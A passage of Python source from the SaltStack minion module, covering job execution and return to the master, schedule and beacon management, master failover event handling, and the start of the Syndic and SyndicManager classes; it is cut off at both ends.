'success': [False] * num_funcs
}
else:
ret = {
'return': {},
'retcode': {},
'success': {}
}
for ind in range(0, num_funcs):
if not multifunc_ordered:
ret['success'][data['fun'][ind]] = False
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts['pillar'].get('minion_blackout', False):
whitelist = minion_instance.opts['pillar'].get('minion_blackout_whitelist', [])
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
elif minion_instance.opts['grains'].get('minion_blackout', False):
whitelist = minion_instance.opts['grains'].get('minion_blackout_whitelist', [])
if data['fun'][ind] != 'saltutil.refresh_pillar' and data['fun'][ind] not in whitelist:
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError('Minion in blackout mode. Set \'minion_blackout\' '
'to False in pillar or grains to resume operations. Only '
'saltutil.refresh_pillar allowed in blackout mode.')
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
key = ind if multifunc_ordered else data['fun'][ind]
ret['return'][key] = func(*args, **kwargs)
retcode = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
if retcode == 0:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(ret['return'][key].get(x, True)
for x in ('result', 'success'))
except Exception:
# return data is not a dict
func_result = True
if not func_result:
retcode = 1
ret['retcode'][key] = retcode
ret['success'][key] = retcode == 0
except Exception as exc:
trb = traceback.format_exc()
log.warning('The minion function caused an exception: %s', exc)
if multifunc_ordered:
ret['return'][ind] = trb
else:
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
if minion_instance.connected:
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job %s: %s',
data['jid'], exc
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
log.trace('Return data: %s', ret)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['uid'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
if ret['jid'] == 'req':
ret['jid'] = salt.utils.jid.gen_jid(self.opts)
salt.utils.minion.cache_jobs(self.opts, ret['jid'], ret)
if not self.opts['pub_ret']:
return ''
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _return_pub_multi(self, rets, ret_cmd='_return', timeout=60, sync=True):
'''
Return the data from the executed command to the master server
'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to False in Neon Salt release
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist)
elif func == 'postpone_job':
self.schedule.postpone_job(name, data)
elif func == 'skip_job':
self.schedule.skip_job(name, data)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
elif func == 'get_next_fire_time':
self.schedule.get_next_fire_time(name)
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons(include_opts, include_pillar)
elif func == 'list_available':
self.beacons.list_available_beacons()
elif func == 'validate_beacon':
self.beacons.validate_beacon(name, beacon_data)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
if tag.startswith('module_refresh'):
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
elif tag.startswith('pillar_refresh'):
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
elif tag.startswith('beacons_refresh'):
self.beacons_refresh()
elif tag.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif tag.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif tag.startswith('grains_refresh'):
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif tag.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif tag.startswith('_minion_mine'):
self._mine_send(tag, data)
elif tag.startswith('fire_master'):
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif tag.startswith(master_event(type='disconnected')) or tag.startswith(master_event(type='failback')):
# if the master disconnect event is for a different master, raise an exception
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' when mine failback is \'{1}\''.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job to don't interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive'))
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule to use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
elif tag.startswith(master_event(type='connected')):
# handle this event only once. otherwise it will pollute the log
# also if master type is failover all the reconnection work is done
# by `disconnected` event handler and this event must never happen,
# anyway check it to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
elif tag.startswith('__schedule_return'):
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
elif tag.startswith('_salt_error'):
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
elif tag.startswith('salt/auth/creds'):
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# old style event. Defaults to false in Neon Salt release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
